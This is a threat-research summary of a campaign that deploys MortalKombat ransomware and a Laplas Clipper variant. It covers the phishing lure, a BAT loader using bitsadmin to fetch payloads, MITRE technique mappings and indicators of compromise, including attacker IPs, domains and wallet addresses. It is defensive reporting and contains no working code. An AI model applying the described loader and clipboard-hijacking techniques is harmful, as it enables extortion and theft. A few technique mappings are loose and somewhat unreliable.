Threat Research

New MortalKombat ransomware and Laplas Clipper malware threats deployed in financially motivated campaign

Securonix

Unidentified threat actor(s) have deployed MortalKombat ransomware alongside a GO variant of Laplas Clipper in a financially motivated campaign since December 2022, using phishing and an automated loader to drop payloads. The operation also leverages RDP scanning and attacker-controlled download servers; victims’ cryptocurrency wallets are targeted via clipboard manipulation and ransom negotiations. #MortalKombat #LaplasClipper #Xorist #QTOX #CoinPayments #clipper.guru

Keypoints

  • Since December 2022, a threat actor group has deployed MortalKombat ransomware and Laplas Clipper GO variant in financially motivated campaigns.
  • Initial infection commonly begins with a phishing email impersonating CoinPayments, delivering a BAT loader that downloads and runs the payload from attacker-controlled hosting.
  • MortalKombat ransomware is analyzed as belonging to the Xorist family, encrypting files, dropping a ransom note, changing wallpaper, and deleting or corrupting certain indicators to hinder analysis.
  • Laplas Clipper GO variant acts as a clipboard stealer, monitors cryptocurrency wallet addresses, and overwrites them with attacker-controlled addresses via a Clipper bot at clipper.guru.
  • Both threats rely on download URLs (193.169.255.78 and 144.76.136.153) and attacker-controlled domains (clipper.guru, transfer.sh) for payload delivery and C2/lookup operations.
  • qTOX is used by MortalKombat for ransom communications; attackers also provide a ProtonMail address for contact.
  • Victims are predominantly in the United States, with smaller fractions in the United Kingdom, Turkey, and the Philippines.
  • MITRE-aligned techniques observed include CLI and scripting usage, registry and startup modifications, file discovery, system and registry queries, and data exfiltration over unencrypted/non-C2 channels.
  • The campaign demonstrates persistent, multi-stage infection featuring a BAT loader, staged payloads, and cleanup of traces to complicate analysis.

MITRE Techniques

  • [T1059] Command-Line Interface – The BAT loader script uses the living-off-the-land binary (LoLBin) bitsadmin to download a malicious ZIP file from the attacker-controlled hosting server to the victim machine’s local user applications temporary folder. ‘The BAT loader script uses the living-off-the-land binary (LoLBin) bitsadmin to download a malicious ZIP file from an attacker-controlled hosting server to the victim’s machine’
  • [T1064] Scripting – The loader script inflates the downloaded ZIP in the “%TEMP%” location and drops a malicious executable with double extensions like “.PDF.EXE”. ‘Using an embedded VB script, the BAT loader script inflates the downloaded malicious ZIP in the “%TEMP%” location and drops a malicious executable file with double file extensions “.PDF.EXE”’
  • [T1106] Execution through API – The BAT loader runs the dropped payload as a process on the victim machine. ‘The BAT loader script starts the dropped malware using the Windows start command’
  • [T1197] BITS Jobs – The BAT loader uses bitsadmin, a BITS utility, to download the malicious ZIP. ‘bitsadmin to download a malicious ZIP file’
  • [T1060] Registry Run Keys / Startup Folder – MortalKombat creates Run registry key labeled Alcmeter to achieve persistence. ‘HKEY_LOCAL_MACHINE…RunAlcmeter’
  • [T1112] Modify Registry – The ransomware registers its classes, icon, and file associations via registry keys. ‘registers its classes, filename extension, and icon for the encrypted files through the defaulticon registry key and shell open command keys’
  • [T1082] System Information Discovery – The Clipper workflow includes registering the victim’s machine with the Clipper bot by sending the desktop name and user ID. ‘registers the victim’s machine with the Clipper bot by sending the victim’s desktop name and user ID’
  • [T1083] File and Directory Discovery – MortalKombat discovers and maps the logical drives, enumerates files, and encrypts matches. ‘discovers and maps the logical drives… enumerates every file and matches the file extension’
  • [T1012] Query Registry – Ransomware updates registry-related keys for persistence and file handling (e.g., DefaultIcon and shell open keys). ‘shell open command keys’
  • [T1120] Peripheral Device Discovery – While not explicitly described as peripheral, the campaign enumerates files across mapped drives and external-like locations, indicating broad discovery. ‘maps the logical drives… and searches through all folders recursively’
  • [T1048.003] Exfiltration Over Unencrypted Non-C2 Protocol – The Clipper bot exchanges wallet addresses via HTTP GET requests to clipper.guru, enabling exfiltration of wallet data. ‘communication with the Clipper bot is performed using the HTTP GET method’
  • [T1486] Data Encrypted for Impact – MortalKombat encrypts numerous file types and changes file extensions, rendering files inaccessible. ‘encrypts various files on the victim machine’s filesystem’

Indicators of Compromise

  • [IP Address] – Example: 193.169.255.78 (Poland) – download MortalKombat ransomware via attacker-controlled server; used as part of the campaign’s delivery infrastructure
  • [IP Address] – Example: 144.76.136.153 – download Laplas Clipper payload from transfer.sh server; involved in the campaign
  • [Domain] – clipper.guru – Clipper bot server used for registering victims, fetching regex, and exchanging wallet addresses
  • [Domain] – transfer.sh – Host for downloading Laplas Clipper payload
  • [Domain] – CoinPayments.net (spoofed sender) – Impersonated cryptocurrency payment gateway in phishing emails
  • [Email] – [email protected] – Spoofed sender address used in phishing emails
  • [Filename] – E7OKC9s3llhAD13.exe – MortalKombat ransomware executable dropped to disk
  • [Filename] – HOW TO DECRYPT FILES.txt – Ransom note dropped alongside encryption
  • [Wallet Address] – 0x516DE893B9c9430066bC1116Feaa6E09A6349d83 and 0x516Acfd0bae6e65A45e0808c6Ae7560d9622B246 and 0xbd0b7a89674A0CFf1870b5aC65578b39172979f9 – attacker-controlled Ethereum addresses shown in clipboard exchange
  • [Wallet Address] – Certain attacker-controlled Ethereum addresses received from Clipper bot in tests (e.g., 0x516Acfd0ba… and 0xbd04EeD05C…)

Read more: https://blog.talosintelligence.com/new-mortalkombat-ransomware-and-laplas-clipper-malware-threats/